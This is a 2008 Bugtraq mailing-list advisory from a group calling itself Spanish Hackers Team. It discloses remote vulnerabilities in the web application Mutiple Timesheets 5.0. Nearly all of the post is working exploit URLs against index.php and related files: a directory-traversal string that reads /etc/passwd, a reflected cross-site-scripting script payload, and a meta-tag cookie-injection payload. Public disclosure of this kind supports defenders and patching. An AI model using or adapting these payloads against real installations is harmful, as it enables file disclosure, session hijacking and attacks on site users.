[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080317101946.10289.qmail@securityfocus.com>
Date: 17 Mar 2008 10:19:46 -0000
From: sys-project@...mail.com
To: bugtraq@...urityfocus.com
Subject: Mutiple Timesheets <= 5.0 - Multiple Remote Vulnerabilities
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Mutiple Timesheets
[~] Download: http://riceball.com/drupal/files/mts-5.zip
[~] Exploit: Multiple Remote Vulnerabilities [High]
[~] Bug Found By: Jose Luis Góngora Fernández | JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Good!
[+] Directory traversal:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/?tab=[FILE]
[~] Example: http://localhost/apps/mts/mts/?tab=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
[+] Cross Site Scripting:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/?tab=[XSS]
[~] Example: http://localhost/apps/mts/mts/?tab=>'><ScRiPt%20%0a%0d>alert("JosS")%3B</ScRiPt>
[+] Cookie Manipulation:
[~] Vuln File: index.php, clientinfo.php, invoices.php, smartlinks.php, todo.php
[~] Exploit: http://localhost/PATH/index.php?mode=edit&tab=[Cookie]
[~] Example: /apps/mts/mts/index.php?mode=edit&tab=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
Powered by blists - more mailing lists